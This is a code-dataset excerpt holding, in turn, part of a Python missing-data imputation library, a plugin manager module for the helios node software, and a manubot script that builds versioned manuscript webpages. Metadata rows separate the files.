self.categorical_columns = [x for x in self.df_train.columns[np.where(np.logical_and(self.df_train.dtypes != np.float64,self.df_train.dtypes != np.float32))[0]] if not(x in self.exclude_cols)]
self.numerical_columns = [x for x in self.df_train.columns[np.where(np.logical_or(self.df_train.dtypes == np.float64,self.df_train.dtypes == np.float32))[0]] if not(x in self.exclude_cols)]
self.custom_postprocessing_fn = self.kwargs["custom_postprocessing_fn"] if "custom_postprocessing_fn" in kwargs.keys() else None
self.oe = {}
for c in self.categorical_columns if label_encode else []:
oe = OrdinalEncoder()
self.df_train[c] = oe.fit_transform(self.df_train[[c]].values)
self.oe[c] = oe
self.df_train_min = self.df_train.min()
self.df_train_max = self.df_train.max()
self.ss = {}
for c in self.categorical_columns+self.numerical_columns if standard_scale_all else (self.numerical_columns if standard_scale else []):
ss = RobustScaler()
self.df_train[c] = ss.fit_transform(self.df_train[[c]].values)
self.ss[c] = ss
self.imputer = None
def impute(self, df_test=None, impute_cols=None, n_imputations=100, return_reduced=True, retrain=False):
'''
returns a list of pandas dataframes one for each entry in impute_cols with columns
id: index
imputation_id: enumerates the different imputations 0...n_imputations-1
cols in entry from impute_cols: imputed values (or all values if return_reduced=True)
optional: sampling_prob: normalized or unnormalized sampling probabilities
'''
print(f'Imputing dataset with n = {len(df_test)} samples and {n_imputations} imputations')
if(impute_cols is None):
impute_cols = [[x] for x in self.df_train.columns if x not in self.exclude_cols]
df_test = self.df_train if df_test is None else self.preprocess(df_test.copy())
if(not(isinstance(impute_cols[0],list)) and not(isinstance(impute_cols[0],np.ndarray))):
impute_cols = [impute_cols]
res = self._impute(df_test=df_test, impute_cols=impute_cols, n_imputations=n_imputations, return_reduced=return_reduced, retrain=retrain)
return [self.postprocess(r) for r in res]
def _impute(self, df_test=None, impute_cols=None, n_imputations=100, return_reduced=True, retrain=False):
'''
internal imputation routine to be implemented by each specific imputer
'''
pass
def preprocess(self, df):
'''routine to be applied in derived classes '''
for c in self.oe.keys():
df[c] = self.oe[c].transform(df[[c]].values)
for c in self.ss.keys():
df[c] = self.ss[c].transform(df[[c]].values)
return df
def postprocess(self, df):
#round and truncate
for c in self.ss.keys():
if(c in df.columns):
df[c] = self.ss[c].inverse_transform(df[[c]].values)
for c in self.categorical_columns:
if(c in df.columns):
df[c] = df[c].astype(float).round(0).astype(int)
df[c] = df[c].clip(lower=self.df_train_min[c], upper=self.df_train_max[c])
for c in self.oe.keys():
if(c in df.columns):
df[c] = self.oe[c].inverse_transform(df[[c]].values)
#custom postprocessing
cols=[x for x in df.columns if x not in ["id","imputation_id","sampling_prob"]]
if(self.custom_postprocessing_fn is not None):
df[cols] = self.custom_postprocessing_fn(df[cols])
return df
###############################################################################################
# Imputer Implementations
###############################################################################################
class IterativeImputer(ImputerBase):
'''
simple imputer based on sklearn's IterativeImputer (uses regressor for all columns)
Parameters:
n_estimators: number of RF estimators
max_iter: maximum number of iterations in IterativeImputer
algorithm: RandomForest/ExtraTrees (standard implementation) or RandomForestSampling/ExtraTreesSampling (with stochastic sampling from a fitted tree)
'''
#c.f. https://github.com/scikit-learn/scikit-learn/pull/13025/files
def __init__(self, df_train, **kwargs):
super().__init__(df_train, **kwargs)
self.n_estimators = self.kwargs["n_estimators"] if "n_estimators" in self.kwargs.keys() else 100
self.max_iter = self.kwargs["n_iter"] if "n_iter" in self.kwargs.keys() else 10
self.algorithm = self.kwargs["algorithm"] if "algorithm" in self.kwargs.keys() else "RandomForestSampling"
self.n_jobs = self.kwargs["n_jobs"] if "n_jobs" in self.kwargs.keys() else -1
if(self.algorithm == "RandomForest"):
self.cls_regressor = RandomForestRegressor
elif(self.algorithm == "RandomForestSampling"):
self.cls_regressor = RandomForestRegressorSampling
elif(self.algorithm == "ExtraTrees"):
self.cls_regressor = ExtraTreesRegressor
elif(self.algorithm == "ExtraTreesSampling"):
self.cls_regressor = ExtraTreesRegressorSampling
else:
assert(False)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
include_cols = [x for x in self.df_train.columns if not x in self.exclude_cols]
integer_cols = self.df_train.columns[np.where(self.df_train.dtypes == np.int64)[0]]
for i in tqdm(list(range(1 if self.algorithm.endswith("Sampling") else n_imputations))):
#store one imputer
if(not(self.algorithm.endswith("Sampling")) or self.imputer is None or retrain is True):
self.imputer = IterativeImputerOriginal(self.cls_regressor(n_estimators=self.n_estimators,n_jobs=self.n_jobs),random_state=i, max_iter=self.max_iter, imputation_order="random")
self.imputer.fit(self.df_train[include_cols])
else:
print("Info: using trained imputer; pass retrain=True to retrain")
for k in tqdm(list(range(n_imputations)),leave=False) if self.algorithm.endswith("Sampling") else [1]:#only fit once for Samplers
for j,ic in enumerate(impute_cols):
df_test_tmp = df_test[include_cols].copy()
df_test_tmp[ic] = np.nan
df_test_tmp = pd.DataFrame(data=self.imputer.transform(df_test_tmp),columns=include_cols)
for c in self.exclude_cols:#restore excluded cols
df_test_tmp[c]=df_test[c]
df_test_tmp["imputation_id"]=k if self.algorithm.endswith("Sampling") else i #add imputation id
df_test_tmp["id"]=df_test_tmp.index
if(return_reduced):
df_test_tmp=df_test_tmp[["id","imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
class IterativeImputerEnhanced(IterativeImputer):
'''
more elaborate imputer that can deal with categorical variables
c.f. https://github.com/scikit-learn/scikit-learn/pull/13025/files
Parameters:
n_estimators: number of RF estimators
max_iter: maximum number of iterations in IterativeImputer
algorithm: RandomForest/ExtraTrees (standard implementation) or RandomForestSampling/ExtraTreesSampling (with stochastic sampling from a fitted tree)
'''
def __init__(self, df_train, **kwargs):
super().__init__(df_train, **kwargs)
self.n_estimators = self.kwargs["n_estimators"] if "n_estimators" in self.kwargs.keys() else 100
self.max_iter = self.kwargs["n_iter"] if "n_iter" in self.kwargs.keys() else 10
self.algorithm = self.kwargs["algorithm"] if "algorithm" in self.kwargs.keys() else "RandomForestSampling"
self.n_jobs = self.kwargs["n_jobs"] if "n_jobs" in self.kwargs.keys() else -1
if(self.algorithm == "RandomForest"):
self.cls_regressor = RandomForestRegressor
self.cls_classifier = RandomForestClassifier
elif(self.algorithm == "RandomForestSampling"):
self.cls_regressor = RandomForestRegressorSampling
self.cls_classifier = RandomForestClassifierSampling
elif(self.algorithm == "ExtraTrees"):
self.cls_regressor = ExtraTreesRegressor
self.cls_classifier = ExtraTreesClassifier
elif(self.algorithm == "ExtraTreesSampling"):
self.cls_regressor = ExtraTreesRegressorSampling
self.cls_classifier = ExtraTreesClassifierSampling
else:
assert(False)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
impute_cols_flat = np.unique([item for sublist in impute_cols for item in sublist])
include_cols = [x for x in self.df_train.columns if not x in self.exclude_cols]
nonfloat_cols = list(self.df_train.columns[np.where(np.logical_and(self.df_train.dtypes != np.float64,self.df_train.dtypes != np.float32))[0]])
integer_cols = list(self.df_train.columns[np.where(self.df_train.dtypes == np.int64)[0]])
classification_cols = [x for x in nonfloat_cols if (x not in self.nocat_cols and x in include_cols)]
regression_cols = [x for x in include_cols if x not in classification_cols]
classification_cols_selected = [x for x in classification_cols if x in impute_cols_flat]
classification_cols_rest = [x for x in classification_cols if not x in impute_cols_flat]
regression_cols_selected = [x for x in regression_cols if x in impute_cols_flat]
regression_cols_rest = [x for x in regression_cols if not x in impute_cols_flat]
for i in tqdm(list(range(1 if self.algorithm.endswith("Sampling") else n_imputations))):
#store one imputer for later usage
if(not(self.algorithm.endswith("Sampling")) or self.imputer is None or retrain is True):
self.imputer = IterativeImputerPR(
estimator=[
(self.cls_classifier(n_estimators=self.n_estimators), classification_cols_selected),
(self.cls_regressor(n_estimators=self.n_estimators), regression_cols_selected),
(DummyClassifier(strategy="most_frequent"), classification_cols_rest),
(DummyRegressor(strategy="median"), regression_cols_rest),
],
transformers=[
(OneHotEncoder(sparse=False), classification_cols_selected),
(StandardScaler(), regression_cols)
],
initial_strategy="most_frequent",
n_jobs=self.n_jobs, max_iter=self.max_iter,imputation_order="random")
self.imputer.fit(self.df_train[include_cols])
else:
print("Info: using trained imputer; pass retrain=True to retrain")
for k in tqdm(list(range(n_imputations)),leave=False) if self.algorithm.endswith("Sampling") else [1]:#only fit once for Samplers
for j,ic in enumerate(impute_cols):
df_test_tmp = df_test[include_cols].copy()
df_test_tmp[ic] = np.nan
df_test_tmp = pd.DataFrame(data=self.imputer.transform(df_test_tmp),columns=include_cols)
for c in self.exclude_cols:#restore excluded cols
df_test_tmp[c]=df_test[c]
df_test_tmp["imputation_id"]=k if self.algorithm.endswith("Sampling") else i#add imputation id
df_test_tmp["id"]=df_test_tmp.index
if(return_reduced):
df_test_tmp=df_test_tmp[["id","imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
class TrainSetImputer(ImputerBase):
'''
imputer just inserts randomly sampled training samples
'''
def __init__(self, df_train, **kwargs):
kwargs["label_encode"]=False
kwargs["standard_scale"]=False
super().__init__(df_train, **kwargs)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
for i in tqdm(list(range(n_imputations))):
for j, ic in enumerate(impute_cols):
df_test_tmp = df_test.copy()
df_test_tmp[ic] = self.df_train[ic].sample(n=len(df_test_tmp)).values
df_test_tmp["imputation_id"] = i # add imputation id
df_test_tmp["id"] = range(len(df_test_tmp))
if(return_reduced):
df_test_tmp = df_test_tmp[["id", "imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
class MedianImputer(ImputerBase):
'''
imputer just inserts the median of the training samples (all of them identical so n_imputations should be set to 1)
'''
def __init__(self, df_train, **kwargs):
kwargs["label_encode"]=False
kwargs["standard_scale"]=False
super().__init__(df_train, **kwargs)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
res=[[] for _ in range(len(impute_cols))]
for i in tqdm(list(range(n_imputations))):
for j,ic in enumerate(impute_cols):
df_test_tmp = df_test.copy()
df_test_tmp[ic]=self.df_train[ic].median().values[0]
df_test_tmp["imputation_id"]=i
df_test_tmp["id"]=df_test_tmp.index
if(return_reduced):
df_test_tmp=df_test_tmp[["id","imputation_id"]+list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
def _swap_axis(arr: np.ndarray, axis=Union[int, List[int]], dim: int=None, backward=False) -> np.ndarray:
"""
iteratively swaps all axis to the end of the matrix, arr.ndim = 1 or 2
:param arr: square matrix, will be copied
:param axis: list of integers, will be swaped to the end of the array
:param dim: defines which dimensions to be swap. If None all dimension will be swapped
:param backward: perform inverse swap
:return: permutated matrix
"""
if isinstance(axis, list) is False:
assert isinstance(axis, int), f'axis = {axis} of incorrect type.'
axis = [axis]
assert arr.ndim == 1 or arr.ndim == 2, 'only vector or two-dimensional matrix allowed'
target_axis = (arr.shape[0] - np.arange(len(axis)) - 1).tolist()
dim_one = False
dim_two = False
if dim is None:
dim_one = True
if arr.ndim == 2:
dim_two = True
elif dim == 0:
dim_one = True
elif dim == 1: # only second axis will be swapped
dim_two = True
target_axis = (arr.shape[1] - np.arange(len(axis)) - 1).tolist()
if backward is True:
axis.reverse()
target_axis.reverse()
temp = arr.copy()
for tar, ax in zip(target_axis, axis):
if dim_one is True:
row_org = temp[ax].copy()
row_target = temp[tar].copy()
temp[ax], temp[tar] = row_target, row_org # swap rows
if dim_two is True:
col_org = temp[:, ax].copy()
col_target = temp[:, tar].copy()
temp[:, ax], temp[:, tar] = col_target, col_org
return temp
K = np.array([[11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34], [41, 42, 43, 44]])
axis = [0, 3]
a = _swap_axis(K, axis)
b = _swap_axis(a, axis, backward=True)
assert np.alltrue(np.equal(K, b)), 'swap axis function modified'
class GaussianProcessImputer(ImputerBase):
"""
draws impute samples from a multivariate gaussian. Standard covariance from train samples is used and conditioned on
"""
def __init__(self, df_train, **kwargs):
kwargs["standard_scale_all"]= True
super().__init__(df_train, **kwargs)
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
covariance_matrix = self.df_train.cov()
mean = self.df_train.mean()
# uncomment to ignore feature correlations
# covariance_matrix = pd.DataFrame(np.diag(np.diag(covariance_matrix)).reshape(covariance_matrix.shape))
res = [[] for _ in range(len(impute_cols))]
for j, ic in tqdm(list(enumerate(impute_cols))):
for i in tqdm(list(range(n_imputations)), leave=False):
n_imputed = len(ic)
# separate training and label features
index_columns = [df_test.columns.get_loc(key) for key in ic]
cov_imputed = _swap_axis(covariance_matrix.values, index_columns)
mean_imputed = _swap_axis(mean.values, index_columns)
x = _swap_axis(df_test.values, index_columns, dim=1) # sort only order of feature columns
mean_train = mean_imputed[:-n_imputed]
mean_star = mean_imputed[-n_imputed:]
x_train = x[:, :-n_imputed]
x_star = x[:, -n_imputed:]
K_tt = cov_imputed[:-n_imputed, :-n_imputed] # tt: train, train
K_st = cov_imputed[-n_imputed:, :-n_imputed] # st: star/predict, train
K_ss = cov_imputed[-n_imputed:, -n_imputed:] # ss: start/predict, star/predict
temp = scipy.linalg.solve(K_tt, (x_train - mean_train).T)
mean_conditioned = (mean_star[:, np.newaxis] + K_st @ temp).T
cov_conditioned = K_ss - K_st @ scipy.linalg.solve(K_tt, K_st.T)
mvn = scipy.stats.multivariate_normal(mean=np.zeros(n_imputed), cov=cov_conditioned)
samples = mvn.rvs(x_star.shape[0]).reshape(mean_conditioned.shape) \
+ mean_conditioned # n_samples x n_imputed
# store new samples
df_test_tmp = df_test.copy()
df_test_tmp[ic] = samples
df_test_tmp["imputation_id"] = i # add imputation id
df_test_tmp["id"] = df_test_tmp.index
if return_reduced is True:
df_test_tmp = df_test_tmp[["id", "imputation_id"] + list(ic)]
res[j].append(df_test_tmp)
return [pd.concat(r) for r in res]
import torch
class TrainSetMahalanobisImputer(ImputerBase):
"""
implements the Imputer from 1903.10464
Parameters:
sigma: occurring in the denominator of the exponential; small sigma- most weight to closest training observations (low bias and high variance); large sigma vice versa
batch_size_test: process test set in batches
"""
def __init__(self, df_train, **kwargs):
kwargs["standard_scale_all"]= True
kwargs["gpus"] = kwargs["gpus"] if "gpus" in kwargs.keys() else 0
super().__init__(df_train, **kwargs)
self.sigma = kwargs["sigma"] if "sigma" in kwargs.keys() else 0.1
self.batch_size_test = kwargs["batch_size_test"] if "batch_size_test" in kwargs.keys() else 0
def _impute(self, df_test, impute_cols, n_imputations=100, return_reduced=True, retrain=False):
non_impute_cols = [[x for x in self.df_train.columns if not(x in self.exclude_cols) and not(x in ic)] for ic in impute_cols]
train_equals_test = self.df_train.equals(df_test)
res=[]
if(self.batch_size_test>0):
batches = len(df_test)//self.batch_size_test+1 if len(df_test)%self.batch_size_test >0 else len(df_test)//self.batch_size_test
batch_id_start = [i*self.batch_size_test for i in range(batches)]
batch_id_end = [min((i+1)*self.batch_size_test,len(df_test)) for i in range(batches)]
else:
batch_id_start = [0]
batch_id_end = [len(df_test)]
for j, (ic,nic) in tqdm(list(enumerate(zip(impute_cols,non_impute_cols)))):
cov = self.df_train[nic].cov()
covinv = np.linalg.pinv(cov)#was .inv
df_imputed = []
for bis,bie in tqdm(list(zip(batch_id_start,batch_id_end)),leave=False):
xdelta = np.expand_dims(np.array(self.df_train[nic]),1)-np.expand_dims(np.array(df_test[nic].iloc[range(bis,bie)]),0) #trainid,testid,featureid
##############
if(self.kwargs["gpus"]>0):
with torch.no_grad():
xdelta_torch = torch.from_numpy(xdelta).cuda()
covinv_torch = torch.from_numpy(covinv).cuda()
distssq = torch.mean(torch.einsum('ijk,kl->ijl',xdelta_torch,covinv_torch)*xdelta_torch,dim=2).cpu().numpy()
else:
distssq = np.mean(np.einsum('ijk,kl->ijl',xdelta,covinv)*xdelta,axis=2) #trainid, testid
weights = np.exp(-0.5*distssq/self.sigma/self.sigma) #trainid, testid
#exclude the sample itself if train_equals_test
train_ids = np.argsort(weights,axis=0)[-n_imputations:,].T if not(train_equals_test) else np.argsort(weights,axis=0)[-n_imputations-1:-1,].T #testid, trainid/n_imputations
imputation_weights = np.array([weights[sid,i] for i,sid in enumerate(train_ids)]) #testid, n_imputations
assert np.all(np.sum(imputation_weights,axis=1)>1e-8),"Assert(TrainSetMahalanobisImputer): weights too small. Increase the imputer's sigma parameter."
imputation_ids = np.repeat([range(n_imputations)],bie-bis,axis=0)
test_ids = np.array([[i for _ in range(n_imputations)] for i in range(bis,bie)])
#flatten everything
train_ids = train_ids.flatten()
imputation_weights = imputation_weights.flatten()
imputation_ids = imputation_ids.flatten()
test_ids = test_ids.flatten()
if(return_reduced):
df_imputed_tmp = self.df_train[ic].iloc[train_ids].copy()
else:
df_imputed_tmp = df_test[ic].iloc[test_ids].copy()
df_imputed_tmp[ic] = self.df_train[ic].iloc[train_ids].values
df_imputed_tmp["id"]=test_ids
df_imputed_tmp["imputation_id"]=imputation_ids
df_imputed_tmp["sampling_prob"]=imputation_weights
df_imputed.append(df_imputed_tmp)
res.append(pd.concat(df_imputed))
return res
| 51.021739
| 360
| 0.623546
|
33ef2cb1b003bd4767695cd47e9d1205d09948d4
| 9,072
|
py
|
Python
|
helios/extensibility/plugin_manager.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
helios/extensibility/plugin_manager.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
helios/extensibility/plugin_manager.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
from abc import (
ABC,
abstractmethod,
)
from argparse import (
ArgumentParser,
Namespace,
_SubParsersAction,
)
import asyncio
import logging
from typing import (
Any,
Awaitable,
Dict,
Iterable,
List,
Optional,
Union,
)
from lahja import (
Endpoint,
EventBus,
)
from helios.config import (
ChainConfig
)
from helios.extensibility.events import (
BaseEvent,
PluginStartedEvent,
)
from helios.extensibility.exceptions import (
UnsuitableShutdownError,
)
from helios.extensibility.plugin import (
BaseAsyncStopPlugin,
BaseIsolatedPlugin,
BaseMainProcessPlugin,
BasePlugin,
BaseSyncStopPlugin,
PluginContext,
)
class BaseManagerProcessScope(ABC):
"""
Define the operational model under which a ``PluginManager`` runs.
"""
endpoint: Endpoint
@abstractmethod
def is_responsible_for_plugin(self, plugin: BasePlugin) -> bool:
"""
Define whether a ``PluginManager`` operating under this scope is responsible
for a given plugin or not.
"""
raise NotImplementedError("Must be implemented by subclasses")
@abstractmethod
def create_plugin_context(self,
plugin: BasePlugin,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any]) -> PluginContext:
"""
Create the ``PluginContext`` for a given plugin.
"""
raise NotImplementedError("Must be implemented by subclasses")
class MainAndIsolatedProcessScope(BaseManagerProcessScope):
def __init__(self, event_bus: EventBus, main_proc_endpoint: Endpoint) -> None:
self.event_bus = event_bus
self.endpoint = main_proc_endpoint
def is_responsible_for_plugin(self, plugin: BasePlugin) -> bool:
return isinstance(plugin, BaseIsolatedPlugin) or isinstance(plugin, BaseMainProcessPlugin)
def create_plugin_context(self,
plugin: BasePlugin,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any]) -> PluginContext:
if isinstance(plugin, BaseIsolatedPlugin):
# Isolated plugins get an entirely new endpoint to be passed into that new process
context = PluginContext(
self.event_bus.create_endpoint(plugin.name)
)
context.args = args
context.chain_config = chain_config
context.boot_kwargs = boot_kwargs
return context
# A plugin that overtakes the main process never gets far enough to even get a context.
# For now it should be safe to just return `None`. Maybe reconsider in the future.
return None
class SharedProcessScope(BaseManagerProcessScope):
def __init__(self, shared_proc_endpoint: Endpoint) -> None:
self.endpoint = shared_proc_endpoint
def is_responsible_for_plugin(self, plugin: BasePlugin) -> bool:
return isinstance(plugin, BaseAsyncStopPlugin)
def create_plugin_context(self,
plugin: BasePlugin,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any]) -> PluginContext:
# Plugins that run in a shared process all share the endpoint of the plugin manager
context = PluginContext(self.endpoint)
context.args = args
context.chain_config = chain_config
context.boot_kwargs = boot_kwargs
return context
class PluginManager:
"""
The plugin manager is responsible to register, keep and manage the life cycle of any available
plugins.
.. note::
This API is very much in flux and is expected to change heavily.
"""
def __init__(self, scope: BaseManagerProcessScope) -> None:
self._scope = scope
self._plugin_store: List[BasePlugin] = []
self._started_plugins: List[BasePlugin] = []
self._logger = logging.getLogger("helios.extensibility.plugin_manager.PluginManager")
@property
def event_bus_endpoint(self) -> Endpoint:
"""
Return the ``Endpoint`` that the ``PluginManager`` uses to connect to the ``EventBus``
"""
return self._scope.endpoint
def register(self, plugins: Union[BasePlugin, Iterable[BasePlugin]]) -> None:
"""
Register one or multiple instances of :class:`~helios.extensibility.plugin.BasePlugin`
with the plugin manager.
"""
new_plugins = [plugins] if isinstance(plugins, BasePlugin) else plugins
self._plugin_store.extend(new_plugins)
def amend_argparser_config(self,
arg_parser: ArgumentParser,
subparser: _SubParsersAction) -> None:
"""
Call :meth:`~helios.extensibility.plugin.BasePlugin.configure_parser` for every registered
plugin, giving them the option to amend the global parser setup.
"""
for plugin in self._plugin_store:
plugin.configure_parser(arg_parser, subparser)
def broadcast(self, event: BaseEvent, exclude: BasePlugin = None) -> None:
"""
Notify every registered :class:`~helios.extensibility.plugin.BasePlugin` about an
event and check whether the plugin wants to start based on that event.
If a plugin gets started it will cause a
:class:`~helios.extensibility.events.PluginStartedEvent` to get
broadcasted to all other plugins, giving them the chance to start based on that.
"""
for plugin in self._plugin_store:
if plugin is exclude or not self._scope.is_responsible_for_plugin(plugin):
self._logger.debug("Skipping plugin %s (not responsible)", plugin.name)
continue
plugin.handle_event(event)
if plugin in self._started_plugins:
continue
if not plugin.should_start():
continue
plugin._start()
self._started_plugins.append(plugin)
self._logger.info("Plugin started: %s", plugin.name)
self.broadcast(PluginStartedEvent(plugin), plugin)
def prepare(self,
args: Namespace,
chain_config: ChainConfig,
boot_kwargs: Dict[str, Any] = None) -> None:
"""
Create a ``PluginContext`` for every plugin that this plugin manager instance
is responsible for.
"""
for plugin in self._plugin_store:
if not self._scope.is_responsible_for_plugin(plugin):
continue
context = self._scope.create_plugin_context(plugin, args, chain_config, boot_kwargs)
plugin.set_context(context)
def shutdown_blocking(self) -> None:
"""
Synchronously shut down all started plugins.
"""
if isinstance(self._scope, SharedProcessScope):
raise UnsuitableShutdownError("Use `shutdown` for instances of this scope")
self._logger.info("Shutting down PluginManager with scope %s", type(self._scope))
for plugin in self._started_plugins:
if not isinstance(plugin, BaseSyncStopPlugin):
continue
try:
self._logger.info("Stopping plugin: %s", plugin.name)
plugin.stop()
self._logger.info("Successfully stopped plugin: %s", plugin.name)
except Exception:
self._logger.exception("Exception thrown while stopping plugin %s", plugin.name)
async def shutdown(self) -> None:
"""
Asynchronously shut down all started plugins.
"""
if isinstance(self._scope, MainAndIsolatedProcessScope):
raise UnsuitableShutdownError("Use `shutdown_blocking` for instances of this scope")
self._logger.info("Shutting down PluginManager with scope %s", type(self._scope))
async_plugins = [
plugin for plugin in self._started_plugins
if isinstance(plugin, BaseAsyncStopPlugin)
]
stop_results = await asyncio.gather(
*self._stop_plugins(async_plugins), return_exceptions=True
)
for plugin, result in zip(async_plugins, stop_results):
if isinstance(result, Exception):
self._logger.error(
'Exception thrown while stopping plugin %s: %s', plugin.name, result
)
else:
self._logger.info("Successfully stopped plugin: %s", plugin.name)
def _stop_plugins(self,
plugins: Iterable[BaseAsyncStopPlugin]
) -> Iterable[Awaitable[Optional[Exception]]]:
for plugin in plugins:
self._logger.info("Stopping plugin: %s", plugin.name)
yield plugin.stop()
| 33.977528
| 98
| 0.622575
|
9f26b375d9428c4b6cc2841227ca29e34bfef14f
| 7,285
|
py
|
Python
|
build/webpage.py
|
munkm/yt-3.0-paper
|
f0fd907ae1cdec74e4b7bf880c812d9046bfcc44
|
[
"CC-BY-4.0",
"CC0-1.0"
] | 9
|
2019-05-06T10:33:03.000Z
|
2021-12-15T17:36:21.000Z
|
build/webpage.py
|
munkm/yt-3.0-paper
|
f0fd907ae1cdec74e4b7bf880c812d9046bfcc44
|
[
"CC-BY-4.0",
"CC0-1.0"
] | 38
|
2019-05-06T17:13:44.000Z
|
2019-10-22T23:27:44.000Z
|
build/webpage.py
|
munkm/yt-3.0-paper
|
f0fd907ae1cdec74e4b7bf880c812d9046bfcc44
|
[
"CC-BY-4.0",
"CC0-1.0"
] | 3
|
2019-07-25T13:15:42.000Z
|
2020-10-22T23:56:51.000Z
|
import argparse
import os
import pathlib
import shutil
import subprocess
def parse_arguments():
"""
Read and process command line arguments.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--checkout',
nargs='?', const='gh-pages', default=None,
help='branch to checkout /v directory contents from. For example, --checkout=upstream/gh-pages. --checkout is equivalent to --checkout=gh-pages. If --checkout is ommitted, no checkout is performed.',
)
parser.add_argument(
'--version',
default=os.environ.get('TRAVIS_COMMIT', 'local'),
help="Used to create webpage/v/{version} directory. "
"Generally a commit hash, tag, or 'local'. "
"(default: '%(default)s')"
)
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument(
'--no-ots-cache',
action='store_true',
help="disable the timestamp cache."
)
cache_group.add_argument(
'--ots-cache',
default=pathlib.Path('ci/cache/ots'),
type=pathlib.Path,
help="location for the timestamp cache (default: %(default)s)."
)
args = parser.parse_args()
return args
def configure_directories(args):
"""
Add directories to args and create them if neccessary.
Note that versions_directory is the parent of version_directory.
"""
args_dict = vars(args)
# Directory where Manubot outputs reside
args_dict['output_directory'] = pathlib.Path('output')
# Set webpage directory
args_dict['webpage_directory'] = pathlib.Path('webpage')
# Create webpage/v directory (if it doesn't already exist)
args_dict['versions_directory'] = args.webpage_directory.joinpath('v')
args.versions_directory.mkdir(exist_ok=True)
# Checkout existing version directories
checkout_existing_versions(args)
# Create empty webpage/v/version directory
version_directory = args.versions_directory.joinpath(args.version)
if version_directory.is_dir():
print(f'{version_directory} exists: replacing it with an empty directory')
shutil.rmtree(version_directory)
version_directory.mkdir()
args_dict['version_directory'] = version_directory
# Symlink webpage/v/latest to point to webpage/v/commit
latest_directory = args.versions_directory.joinpath('latest')
if latest_directory.is_symlink() or latest_directory.is_file():
latest_directory.unlink()
elif latest_directory.is_dir():
shutil.rmtree(latest_directory)
latest_directory.symlink_to(args.version, target_is_directory=True)
args_dict['latest_directory'] = latest_directory
# Create freeze directory
freeze_directory = args.versions_directory.joinpath('freeze')
freeze_directory.mkdir(exist_ok=True)
args_dict['freeze_directory'] = freeze_directory
return args
def checkout_existing_versions(args):
"""
Must populate webpage/v from the gh-pages branch to get history
References:
http://clubmate.fi/git-checkout-file-or-directories-from-another-branch/
https://stackoverflow.com/a/2668947/4651668
https://stackoverflow.com/a/16493707/4651668
Command modeled after:
git --work-tree=webpage checkout upstream/gh-pages -- v
"""
if not args.checkout:
return
command = [
'git',
f'--work-tree={args.webpage_directory}',
'checkout',
args.checkout,
'--',
'v',
]
print('Attempting checkout with the following command:', ' '.join(command), sep='\n')
process = subprocess.run(command, stderr=subprocess.PIPE)
if process.returncode == 0:
# Addresses an odd behavior where git checkout stages v/* files that don't actually exist
subprocess.run(['git', 'add', 'v'])
else:
stderr = process.stderr.decode()
print(f'Checkout returned a nonzero exit status. See stderr:\n{stderr.rstrip()}')
if 'pathspec' in stderr:
print(
'Manubot note: if there are no preexisting webpage versions (like for a newly created manuscript), '
'the pathspec error above is expected and can be safely ignored.'
) # see https://github.com/manubot/rootstock/issues/183
def create_version(args):
"""
Populate the version directory for a new version.
"""
# Copy content/images to webpage/v/commit/images
shutil.copytree(
src=pathlib.Path('content/images'),
dst=args.version_directory.joinpath('images'),
)
# Copy output files to to webpage/v/version/
renamer = {
'manuscript.html': 'index.html',
'manuscript.pdf': 'manuscript.pdf',
}
for src, dst in renamer.items():
src_path = args.output_directory.joinpath(src)
if not src_path.exists():
continue
shutil.copy2(
src=src_path,
dst=args.version_directory.joinpath(dst),
)
# Create v/freeze to redirect to v/commit
path = pathlib.Path('build/assets/redirect-template.html')
redirect_html = path.read_text()
redirect_html = redirect_html.format(url=f'../{args.version}/')
args.freeze_directory.joinpath('index.html').write_text(redirect_html)
def get_versions(args):
"""
Extract versions from the webpage/v directory, which should each contain
a manuscript.
"""
versions = {x.name for x in args.versions_directory.iterdir() if x.is_dir()}
versions -= {'freeze', 'latest'}
versions = sorted(versions)
return versions
def ots_upgrade(args):
"""
Upgrade OpenTimestamps .ots files in versioned commit directory trees.
Upgrades each .ots file with a separate ots upgrade subprocess call due to
https://github.com/opentimestamps/opentimestamps-client/issues/71
"""
ots_paths = list()
for version in get_versions(args):
ots_paths.extend(args.versions_directory.joinpath(version).glob('**/*.ots'))
ots_paths.sort()
for ots_path in ots_paths:
process_args = ['ots']
if args.no_ots_cache:
process_args.append('--no-cache')
else:
process_args.extend(['--cache', str(args.ots_cache)])
process_args.extend([
'upgrade',
str(ots_path),
])
process = subprocess.run(
process_args,
stderr=subprocess.PIPE,
universal_newlines=True,
)
if process.returncode != 0:
print(f"OpenTimestamp upgrade command returned nonzero code ({process.returncode}).")
if not process.stderr.strip() == 'Success! Timestamp complete':
print(
f">>> {' '.join(map(str, process.args))}\n"
f"{process.stderr}"
)
backup_path = ots_path.with_suffix('.ots.bak')
if backup_path.exists():
if process.returncode == 0:
backup_path.unlink()
else:
# Restore original timestamp if failure
backup_path.rename(ots_path)
if __name__ == '__main__':
args = parse_arguments()
configure_directories(args)
print(args)
create_version(args)
versions = get_versions(args)
print(versions)
